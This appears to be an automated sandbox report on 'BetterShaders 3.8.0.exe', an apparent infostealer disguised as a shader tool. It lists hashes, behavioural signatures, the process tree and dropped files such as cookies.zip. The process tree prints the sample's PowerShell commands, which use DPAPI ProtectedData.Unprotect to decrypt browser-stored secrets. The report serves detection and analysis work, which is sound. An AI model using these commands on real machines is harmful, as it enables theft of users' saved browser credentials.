Overview
overview
7Static
static
3BetterShad....0.exe
windows7-x64
7BetterShad....0.exe
windows10-2004-x64
7$PLUGINSDI...ls.dll
windows7-x64
3$PLUGINSDI...ls.dll
windows10-2004-x64
3$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3BetterShaders.exe
windows10-2004-x64
7LICENSES.c...m.html
windows7-x64
1LICENSES.c...m.html
windows10-2004-x64
1d3dcompiler_47.dll
windows10-2004-x64
1ffmpeg.dll
windows10-2004-x64
1libEGL.dll
windows10-2004-x64
1libGLESv2.dll
windows10-2004-x64
1resources/elevate.exe
windows7-x64
1resources/elevate.exe
windows10-2004-x64
1vk_swiftshader.dll
windows10-2004-x64
1vulkan-1.dll
windows10-2004-x64
1$PLUGINSDI...7z.dll
windows7-x64
3$PLUGINSDI...7z.dll
windows10-2004-x64
3Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
23-05-2024 08:51
Static task
static1
Behavioral task
behavioral1
Sample
BetterShaders 3.8.0.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
BetterShaders 3.8.0.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/System.dll
Resource
win7-20231129-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral7
Sample
BetterShaders.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral8
Sample
LICENSES.chromium.html
Resource
win7-20240221-en
Behavioral task
behavioral9
Sample
LICENSES.chromium.html
Resource
win10v2004-20240426-en
Behavioral task
behavioral10
Sample
d3dcompiler_47.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral11
Sample
ffmpeg.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral12
Sample
libEGL.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral13
Sample
libGLESv2.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral14
Sample
resources/elevate.exe
Resource
win7-20240220-en
Behavioral task
behavioral15
Sample
resources/elevate.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral16
Sample
vk_swiftshader.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral17
Sample
vulkan-1.dll
Resource
win10v2004-20240508-en
Behavioral task
behavioral18
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win7-20240221-en
Behavioral task
behavioral19
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win10v2004-20240508-en
General
-
Target
BetterShaders.exe
-
Size
168.8MB
-
MD5
26e51744ce941b55c7653e9ab229a18f
-
SHA1
bd08f0f5b3f64aba844128dfb2d77312bbef8b46
-
SHA256
3bcf3c61e80cc6346a8af84c89ca2c50a9eef2b6b915c6c73fff8725f1c6b118
-
SHA512
a308443b59a0a5713b99474e30f93a7f8cc98120c11c2f9f5884d5aa61bbf0073a6cfb1c67d676d64656988802fbf1bb8a1f5234df09b1fd2c36f5f7d3fed0a4
-
SSDEEP
1572864:du3SXrDDmfijsEGl0y+Mgp4cLTRN/33i/oHHl9sqPwqZdsJ2DWw3h9JByba/:/XX++LYYyba
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
BetterShaders.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation BetterShaders.exe -
Loads dropped DLL 1 IoCs
Processes:
BetterShaders.exepid process 2880 BetterShaders.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 24 ipapi.co 26 ipapi.co -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
Processes:
cmd.execmd.exepid process 3040 cmd.exe 764 cmd.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exeBetterShaders.exepid process 4600 powershell.exe 4600 powershell.exe 880 powershell.exe 880 powershell.exe 4636 BetterShaders.exe 4636 BetterShaders.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
tasklist.exepowershell.exepowershell.exeBetterShaders.exedescription pid process Token: SeDebugPrivilege 2932 tasklist.exe Token: SeDebugPrivilege 4600 powershell.exe Token: SeDebugPrivilege 880 powershell.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe Token: SeCreatePagefilePrivilege 2880 BetterShaders.exe Token: SeShutdownPrivilege 2880 BetterShaders.exe -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
BetterShaders.execmd.execmd.execmd.exedescription pid process target process PID 2880 wrote to memory of 408 2880 BetterShaders.exe cmd.exe PID 2880 wrote to memory of 408 2880 BetterShaders.exe cmd.exe PID 408 wrote to memory of 2932 408 cmd.exe tasklist.exe PID 408 wrote to memory of 2932 408 cmd.exe tasklist.exe PID 2880 wrote to memory of 3040 2880 BetterShaders.exe cmd.exe PID 2880 wrote to memory of 3040 2880 BetterShaders.exe cmd.exe PID 3040 wrote to memory of 4600 3040 cmd.exe powershell.exe PID 3040 wrote to memory of 4600 3040 cmd.exe powershell.exe PID 2880 wrote to memory of 764 2880 BetterShaders.exe cmd.exe PID 2880 wrote to memory of 764 2880 BetterShaders.exe cmd.exe PID 764 wrote to memory of 880 764 cmd.exe powershell.exe PID 764 wrote to memory of 880 764 cmd.exe powershell.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3212 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3908 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 3908 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 4636 2880 BetterShaders.exe BetterShaders.exe PID 2880 wrote to memory of 4636 2880 BetterShaders.exe BetterShaders.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe"C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:408 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2932 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,143,8,155,162,221,184,73,71,232,222,51,145,193,115,97,9,130,241,224,103,6,120,76,14,50,215,61,172,124,159,238,253,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,99,253,1,12,244,37,76,196,250,204,121,176,50,84,44,171,164,192,123,43,73,12,147,211,193,42,15,39,95,26,62,201,48,0,0,0,199,59,41,134,72,150,192,161,125,143,33,114,13,155,6,139,72,133,43,120,135,38,24,218,101,6,176,207,210,73,64,67,238,175,209,152,192,141,196,93,4,159,79,39,108,201,81,243,64,0,0,0,47,182,203,76,22,230,198,116,189,169,35,195,147,254,206,160,141,223,22,83,122,129,208,253,101,155,106,250,254,105,139,55,133,60,233,210,239,137,168,177,165,144,32,46,241,126,232,206,117,88,178,220,23,105,81,227,111,16,111,158,78,1,233,96), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:3040 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,143,8,155,162,221,184,73,71,232,222,51,145,193,115,97,9,130,241,224,103,6,120,76,14,50,215,61,172,124,159,238,253,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,99,253,1,12,244,37,76,196,250,204,121,176,50,84,44,171,164,192,123,43,73,12,147,211,193,42,15,39,95,26,62,201,48,0,0,0,199,59,41,134,72,150,192,161,125,143,33,114,13,155,6,139,72,133,43,120,135,38,24,218,101,6,176,207,210,73,64,67,238,175,209,152,192,141,196,93,4,159,79,39,108,201,81,243,64,0,0,0,47,182,203,76,22,230,198,116,189,169,35,195,147,254,206,160,141,223,22,83,122,129,208,253,101,155,106,250,254,105,139,55,133,60,233,210,239,137,168,177,165,144,32,46,241,126,232,206,117,88,178,220,23,105,81,227,111,16,111,158,78,1,233,96), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4600 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,204,23,200,182,199,212,101,234,51,160,20,157,150,146,144,151,39,93,3,161,164,186,212,226,57,101,160,86,167,155,8,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,184,144,186,180,174,237,163,184,95,232,101,63,21,177,75,98,215,199,36,30,80,192,146,63,77,115,21,70,102,42,166,165,48,0,0,0,117,126,67,77,96,159,142,116,174,11,86,56,11,231,226,145,7,63,8,207,34,20,54,206,115,112,214,184,19,252,2,122,95,58,116,12,104,15,223,163,49,195,63,147,96,226,86,246,64,0,0,0,114,72,103,37,120,230,180,221,228,136,240,64,66,22,120,71,192,126,130,46,213,57,1,27,188,210,151,225,138,111,6,223,99,131,127,243,133,142,61,229,60,15,180,41,8,227,3,169,15,181,32,167,8,219,218,233,217,48,253,19,227,158,119,122), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,204,23,200,182,199,212,101,234,51,160,20,157,150,146,144,151,39,93,3,161,164,186,212,226,57,101,160,86,167,155,8,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,184,144,186,180,174,237,163,184,95,232,101,63,21,177,75,98,215,199,36,30,80,192,146,63,77,115,21,70,102,42,166,165,48,0,0,0,117,126,67,77,96,159,142,116,174,11,86,56,11,231,226,145,7,63,8,207,34,20,54,206,115,112,214,184,19,252,2,122,95,58,116,12,104,15,223,163,49,195,63,147,96,226,86,246,64,0,0,0,114,72,103,37,120,230,180,221,228,136,240,64,66,22,120,71,192,126,130,46,213,57,1,27,188,210,151,225,138,111,6,223,99,131,127,243,133,142,61,229,60,15,180,41,8,227,3,169,15,181,32,167,8,219,218,233,217,48,253,19,227,158,119,122), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:880 -
C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe"C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1948,i,15345964049162441774,16954473229217659063,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1940 /prefetch:22⤵PID:3212
-
C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe"C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --field-trial-handle=2156,i,15345964049162441774,16954473229217659063,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2152 /prefetch:32⤵PID:3908
-
C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe"C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2516,i,15345964049162441774,16954473229217659063,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1280 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4636
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5f48896adf9a23882050cdff97f610a7f
SHA14c5a610df62834d43f470cae7e851946530e3086
SHA2563ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78
SHA51216644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD546d6c89b6a449ce91c1a3691c516e10e
SHA1dedf2c05d83a8fc311e39fa86af575866f9f7ece
SHA256f6841440d2949cf97fb621923a2f931fca567382856cb60fa4c8ce3f9b81e55f
SHA512bd222cc430c28abe832787973ed2a7a07d58d92f34eed1ebfe69fc4cd8ed59443ed93799979fd39d1b76ef6ff247f3ceb12b3c537de09ffba72ebec748f3e1cd
-
C:\Users\Admin\AppData\Local\Temp\65f10860-8f67-4776-9a0e-78d71a4d9430.tmp.nodeFilesize
1.8MB
MD53072b68e3c226aff39e6782d025f25a8
SHA1cf559196d74fa490ac8ce192db222c9f5c5a006a
SHA2567fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01
SHA51261ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lrcvgiqf.ae4.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\cookies.zipFilesize
22B
MD576cdb2bad9582d23c1f6f4d868218d6c
SHA1b04f3ee8f5e43fa3b162981b50bb72fe1acabb33
SHA2568739c76e681f900923b900c9df0ef75cf421d39cabb54650c4b9ad19b6a76d85
SHA5125e2f959f36b66df0580a94f384c5fc1ceeec4b2a3925f062d7b68f21758b86581ac2adcfdde73a171a28496e758ef1b23ca4951c05455cdae9357cc3b5a5825f
-
memory/880-34-0x000001D16B8A0000-0x000001D16BABC000-memory.dmpFilesize
2.1MB
-
memory/4600-6-0x00000299DC430000-0x00000299DC452000-memory.dmpFilesize
136KB
-
memory/4600-16-0x00000299DC940000-0x00000299DC990000-memory.dmpFilesize
320KB
-
memory/4636-63-0x0000024255F00000-0x0000024255F01000-memory.dmpFilesize
4KB
-
memory/4636-65-0x0000024255F00000-0x0000024255F01000-memory.dmpFilesize
4KB
-
memory/4636-64-0x0000024255F00000-0x0000024255F01000-memory.dmpFilesize
4KB
-
memory/4636-69-0x0000024255F00000-0x0000024255F01000-memory.dmpFilesize
4KB
-
memory/4636-71-0x0000024255F00000-0x0000024255F01000-memory.dmpFilesize
4KB
-
memory/4636-75-0x0000024255F00000-0x0000024255F01000-memory.dmpFilesize
4KB
-
memory/4636-74-0x0000024255F00000-0x0000024255F01000-memory.dmpFilesize
4KB
-
memory/4636-73-0x0000024255F00000-0x0000024255F01000-memory.dmpFilesize
4KB
-
memory/4636-72-0x0000024255F00000-0x0000024255F01000-memory.dmpFilesize
4KB
-
memory/4636-70-0x0000024255F00000-0x0000024255F01000-memory.dmpFilesize
4KB